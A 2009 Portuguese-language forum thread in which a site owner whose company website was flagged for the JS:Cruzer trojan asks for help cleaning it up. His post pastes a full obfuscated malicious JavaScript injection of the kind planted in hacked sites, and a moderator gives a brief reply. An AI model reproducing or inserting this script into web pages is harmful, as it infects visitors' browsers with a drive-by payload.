Scaico 0 Denunciar post Postado Maio 21, 2009 Um colega me enviou um e-mail, avisando que ao tentar entrar no site da empresa em que trabalho, o anti-virus dele alertou para o trojan JS:Cruzer-C [Trj]. Estou pedindo um print-screen do aviso, mas enquanto isso, achei melhor pedir ajuda por aqui. O site é o seguinte: www.padovaniprado.com.br Abraços, Edit: No forum do Avast eu achei algumas informações... Uma pessoa disse que o site estava infectado pelo trojan JS:Cruzer-B [Trj]... Pela similaridade do nome, fui ler o tópico. A resposta dizia que o site havia sido hackeado e que havia um script malicioso no código fonte. No desespero, eu fiz a busca no meu site, encontrei um código que eu não havia inserido e, rapidamente, subi novamente os arquivos "limpos". No entanto, acabei não copiando o código que se encontrava no meu site e agora não posso colar aqui. Porém o código era bem similar ao encontrado no site mencionado no fórum do Avast. Irei colar aqui, caso ajude em alguma coisa: <script language=javascript>jkweiryw="rTSTlWojKZH!kPGpLK%ZYzgrPWgsH!qXUi";jclyts="o3cscrio70t lao6eo67uao67e=o6ao61o76asco72io70o74>o20o20o66uno63tio6fno20o7aeo6bo79(vo63o63o29{vao72 o62yo2co68v=\"o35o65Hyo50 o2bo29o64o4fo6bGUKo24o378o78;o5dNo6dFo5c\"o45o54!o670o63o3do33o6eo26o23o76o2do4do779qBo7ao5ffo49o2eo73l`,o56o6ao75|[o7bo5a(o5ea@o7e1o6ft:o43bo27h6o70}*4o69Jo32o41r\"o2chfuyo6c=o22\",o62o6co72o6dpo2co6bo64o67o63vo2co6ajo6ao3d\"\"o2co74hpv;o66o6fro28by=0;byo3co76o63o63.o6co65no67to68;o62y+o2bo29o7bo20bo6crmo70=vco63.chao72o41o74(o62o79)o3bkdgcv=o68v.io6eo64o65xOf(blo72o6dp);ifo28o6bdgcvo3eo2d1){o20o74hpv=(o28kdgcvo2b1)o25o38o31-o31);if(o74o68o70v<o3do30o29thpv+=81o3bo6ajo6a+=o68o76.charo41t(to68po76-o31)o3b o7do20eo6cse jjj+o3dblro6do70o3b}o68o66uyl+o3do6ajj;do6fcuo6do65o6eto2ewo72io74eo28o68o66o75yo6c);o7d<o2fsco72io70to3e";jfencx=unescape(jclyts.replace(/o/g,jkweiryw.charAt(18)));var cbbg,avtf;document.write(jfencx);cbbg="<l=5J}:+`@&0|@0H3Eu@-@l=5J}:E>+Ot=|FH&:s95J:H^+E<SbR. !+`@&0|@0H3\\E2@-@S=5J}:\\E+SRb3\\E6::}C//999s0tt0`H@&@`J:J=ls&H:/ff|:'sul?E)Ot=|FH&:s5HIH55H5)E\\E><\\/SbR. !>E+d]+</l=5J}:>++";zeky(cbbg);</script> Só o fato de subir os arquivos limpos já é o suficiente para "resolver" o problema? Ou devo fazer algo mais? Compartilhar este post Link para o post Compartilhar em outros sites
Mário Monteiro 179 Denunciar post Postado Maio 22, 2009 talvez volte a alterar se o servidor estiver infectado se tiver acesso ao servidor facilitará a verificação mas aguarde orientações de um analista Compartilhar este post Link para o post Compartilhar em outros sites
Mário Monteiro 179 Denunciar post Postado Junho 22, 2009 Tópico Arquivado Como o autor não respondeu por mais de 30 dias, o tópico foi arquivado. Caso você seja o autor do tópico e quer reabrir, envie uma mensagem privada para um moderador da área juntamente com o link para este tópico e explique o motivo da reabertura. Compartilhar este post Link para o post Compartilhar em outros sites
